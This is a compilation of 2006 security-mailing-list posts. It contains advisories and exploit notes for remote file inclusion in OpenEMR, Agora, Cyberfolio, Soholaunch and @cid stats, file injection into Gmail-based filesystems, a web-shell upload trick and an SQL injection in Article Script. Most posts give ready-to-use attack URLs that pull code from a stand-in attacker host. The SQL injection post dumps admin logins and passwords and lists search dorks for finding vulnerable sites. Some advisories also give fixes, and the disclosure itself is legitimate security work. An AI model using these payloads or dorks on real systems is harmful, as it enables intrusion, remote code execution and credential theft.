"GMail Drive file system" by sending email with Subject: "GMAILFS: /new_filename.txt [13;a;1]" and "new_filename.txt" as attachment. However if the sender is not "self" then the filename will be displayed with red color. The sender email address can be spoofed. - folder creation. You can create new folder by sending email with Subject: "GMAILFS: /new_folder/. [14;a;1]" - rewrite file contains. You can overwrite file displayed content sending email with Subject: "GMAILFS: /existing_path/existing_filename.txt [13;a;1]" and "filename.txt" as attachment. However if the sender is not "self" then the extension will display 2 files with the same name but both will have the same new content. 2. Gmail File Space(GSpace) by Rahul Jonna -- - file injection. You can inject files into the "GSpace file system" by sending email with Subject: "GSPACE|new_filename.txt|2174|1|1|1|gs:/ d$" and putting "new_filename.txt" and "metadata.txt" as attachment. However the interface will fill the "from" information with the sender email address. The sender email address can be spoofed. - folder creation. You can create new folder by sending email with Subject: "GSPACE|test/|-135|1|1|0|gs:/ d$" and "blank.txt" and "metadata.txt" as attachment. However the interface will fill the "from" information with the sender email address. The sender email address can be spoofed. Solution: - there are more possible solutions to filter unwanted content, such as inserting unpredictable id-s in the emails, message signing, but none (in my opinion) which can offer backward compatibility.
[ECHO_ADV_60_2006] OpenEMR <=2.8.1 Multiple Remote File Inclusion Vulnerability
--- [ECHO_ADV_60$2006] OpenEMR <=2.8.1 Multiple Remote File Inclusion Vulnerability --- Author : Dedi Dwianto a.k.a the_day Date Found : November, 01nd 2006 Location: Indonesia, Jakarta web : http://advisories.echo.or.id/adv/adv60-theday-2006.txt Critical Lvl: Highly critical Impact : System access Where : From Remote --- Affected software description: Application : OpenEMR version : <=2.8.1 URL : http://www.oemr.org OpenEMR is Open Source electronic medical record and medical practice management software. OpenEMR is best described as a "system" of programs. The main OpenEMR program consists of the electronic health records and scheduling software. OpenEMR can also be configured for insurance billing with FreeB, accounting with SQL-Ledger, and access controls with php-GACL. --- Vulnerability: ~~ I found vulnerability in interface/billing/billing_process.php ---interface/billing/billing_process.php- Proof Of Concept: ~~~ http://target.com/[OpenEMR-path]/interface/billing/billing_process.php?srcdir=http://atacker.com/inject.txt? http://target.com/[OpenEMR-path]/interface/new/new_patient_save.php?srcdir=http://atacker.com/inject.txt? http://target.com/[OpenEMR-path]/login.php?srcdir=http://atacker.com/inject.txt? http://target.com/[OpenEMR-path]/library/translation.inc.php?GLOBALS[srcdir]=http://atacker.com/inject.txt? Solution: ~~~ - Sanitize variable $srcdir affected files. - Turn off register_globals Timeline : ~ 01 - 11 - 2006 bugs found 01 - 11 - 2006 vendor contacted 07 - 11 - 2006 public disclosure --- Shoutz: ~~~ ~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous ~ Jessy My Brain ~ az001,bomm_3x,matdhule,angelia ~ [EMAIL PROTECTED] ~ #aikmel - #e-c-h-o @irc.dal.net --- Contact: EcHo Research & Development Center the_day[at]echo[dot]or[dot]id [ EOF ]--
[ECHO_ADV_59_2006]Agora 1.4 RC1 "$_SESSION[PATH_COMPOSANT]" Remote File Inclusion Vulnerability
--- [ECHO_ADV_59$2006]Agora 1.4 RC1 "$_SESSION[PATH_COMPOSANT]" Remote File Inclusion Vulnerability --- Author : Dedi Dwianto a.k.a the_day Date Found : November, 01nd 2006 Location: Indonesia, Jakarta web : http://advisories.echo.or.id/adv/adv59-theday-2006.txt Critical Lvl: Highly critical Impact : System access Where : From Remote --- Affected software description: Application : Agora version : 1.4 RC1 URL : http://www.agora.gouv.fr Based on the free software Spip, Agora is a free software of management of contents for Internet developed in php, which makes it possible to put in place and to manage quickly and with lower cost of the Internet sites, Intranet or extranet. --- Vulnerability: ~~ I found vulnerability in modules/Mysqlfinder/MysqlfinderAdmin.php --modules/Mysqlfinder/MysqlfinderAdmin.php-- http://target.com/[agora-1.4-path]/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=http://attacker.com/inject.txt? Solution: ~~~ - Insert new line code : ... include_once 'MysqlfinderParam.inc'; ... Before include_once($_SESSION["PATH_COMPOSANT"]."Commun/Template.inc") - Turn off register_globals - Turn off display_error to Hide Full Path Error Timeline : ~ 01 - 11 - 2006 bugs found 01 - 11 - 2006 vendor contacted 07 - 11 - 2006 public disclosure --- Shoutz: ~~~ ~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous ~ Jessy My Brain ~ az001,bomm_3x,matdhule,angelia ~ [EMAIL PROTECTED] ~ #aikmel - #e-c-h-o @irc.dal.net --- Contact: EcHo Research & Development Center the_day[at]echo[dot]or[dot]id [ EOF ]--
Re: @cid stats v2.3 File Include
Am Sonntag, 5. November 2006 23:33 schrieb mahmood ali: > Completely bogus. If you look closely, the corresponding code in install.php3 is used to create a config file which contains a statement setting $repertoire (from a user input, so here is your injection attack for an install script, which is pretty much what you want, I'd guess). Anyway, if you don't delete install.php3 after the installation is complete, it's your own fault. -- --- Heiko Wundram. x|encon Support der Gehrkens.IT GmbH FON 0511-59027955 | http://www.gehrkens.it FAX 0511-59027956 | http://www.xencon.net Gehrkens.IT GmbH Mailänder Strasse 2 30539 Hannover pgpnqsPtFQ9Bu.pgp Description: PGP signature
[ECHO_ADV_58_2006]Cyberfolio <=2.0 RC1 $av Remote File Inclusion Vulnerability
--- [ECHO_ADV_58$2006]Cyberfolio <=2.0 RC1 $av Remote File Inclusion Vulnerability --- Author : Dedi Dwianto a.k.a the_day Date Found : November, 01nd 2006 Location: Indonesia, Jakarta web : http://advisories.echo.or.id/adv/adv58-theday-2006.txt Critical Lvl: Highly critical Impact : System access Where : From Remote --- Affected software description: Application : Cyberfolio version : <=2.0 RC1 URL : http://www.cyberfolio.org --- Vulnerability: ~~ I found vulnerability in script view.php --view.php--- http://target.com/cyberfolio/portfolio/msg/view.php?av=http://attacker.com/inject.txt? http://target.com/cyberfolio/portfolio/admin/incl_voir_compet.php?av=http://attacker.com/inject.txt? Solution: ~~~ - Sanitize variable $av affected files. - Turn off register_globals Timeline : ~ 01 - 11 - 2006 bugs found 01 - 11 - 2006 vendor contacted 07 - 11 - 2006 public disclosure --- Shoutz: ~~~ ~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous ~ Jessy My Brain ~ az001,bomm_3x,matdhule,angelia ~ [EMAIL PROTECTED] ~ #aikmel - #e-c-h-o @irc.dal.net --- Contact: EcHo Research & Development Center the_day[at]echo[dot]or[dot]id [ EOF ]--
[ECHO_ADV_57_2006]Soholaunch Pro <=4.9 r36 Multiple Remote File Inclusion Vulnerability
--- [ECHO_ADV_57$2006]Soholaunch Pro <=4.9 r36 Multiple Remote File Inclusion Vulnerability --- Author : Dedi Dwianto a.k.a the_day Date Found : October, 31th 2006 Location: Indonesia, Jakarta web : http://advisories.echo.or.id/adv/adv57-theday-2006.txt Critical Lvl: Highly critical Impact : System access Where : From Remote --- Affected software description: Application : Soholaunch Pro Edition version : <=4.9 r46 URL : http://www.soholaunch.com Soholaunch Pro Edition is a software product that makes it easy for people of all experience levels to create and maintain a great website. It reins-in the hard parts of building a website and presents them a way that the non-geek can understand and control --- Vulnerability: ~~ I found vulnerability in script shared_functions.php --shared_functions.php--- http://target.com/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://attacker.com/inject.txt? http://target.com/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://attacker.com/inject.txt? Solution: ~~~ - Sanitize variable $_SESSION['docroot_path'] affected files. - Turn off register_globals Timeline : ~ 31 - 10 - 2006 bugs found 31 - 10 - 2006 vendor contacted 07 - 11 - 2006 public disclosure --- Shoutz: ~~~ ~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous ~ Jessy My Brain ~ az001,bomm_3x,matdhule,angelia ~ [EMAIL PROTECTED] ~ #aikmel - #e-c-h-o @irc.dal.net --- Contact: EcHo Research & Development Center the_day[at]echo[dot]or[dot]id [ EOF ]--
PHP Rapid Kill All Version File Injection
Discovered By:Null PHP Rapid Kill All Version File Injection U Can Upload Your Shell Code To Rapidshare.de and then copy link to the Link to Download text box of the web app then your shell Uploaded To this URL www.site.com/rapidpath/yourfile.php Download App:http://www.filefactory.com/file/f14862/ Email:null_hack(at)yahoo(dot)com Greetz to Gamma Security Team www.gammahack.com www.nullak.com
Stanford university SCARF user editing
vendor:Someone at Stanford university site:http://sourceforge.net/projects/scarf/ vuln: There is no admin check on the file generaloptions.php So anyone can go in and make some changes. One thing to do would be create a user, then go into general options and change your user to an admin. You can also change the background, title, and css page through this file. -navairum
Article Script v1.*and v1.6.3 Sql injection
Article Script v1.*and v1.6.3 Sql injection Script Name :Article Script Home Page:www.articlescript.org Bug Founder :Liz0ziM Mail:[EMAIL PROTECTED] Baba Kimdir? Tabiki Liz0ziM :D http://www.victim.com/articles/rss.php?category= ' sql İnjection Example: http://www.victim.com/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/* admin4521title> --> Admin name :admin4521 http://www.victim.com/articles/cs1120/page_1/link> --> Admin password cs1120 Dork: "Powered by Article Script" ":: Article Script - New User Article ::" intitle:":: Article Script -" "Last Articles::" Greatz My all friend Source: http://www.blogcu.com/Liz0ziM/1312100/
@cid stats v2.3 File Include
###
@cid stats v2.3 File Include
###
Source Code:
http://www.comscripts.com/jump.php?action=script&id=1115
###
Vulnerable Code:_
install.php3
###
In Line 41 :_
require("'.$repertoire."/".'stats_fonctions.php3
###
Exploit :_
http://www.VicTim.com/[EMAIL PROTECTED]/install.php3?repertoire=ShElL.txt?
###
Discoverd By : Mahmood_ali
###
Special Greetings :_ Tryag-Team & 4lKaSrGoLd3n-Team > WwW.DwRaT.CoM &
WwW.Tryag.CoM
###
_
Windows Live Messenger has arrived. Click here to download it for free!
http://imagine-msn.com/messenger/launch80/?locale=en-gb
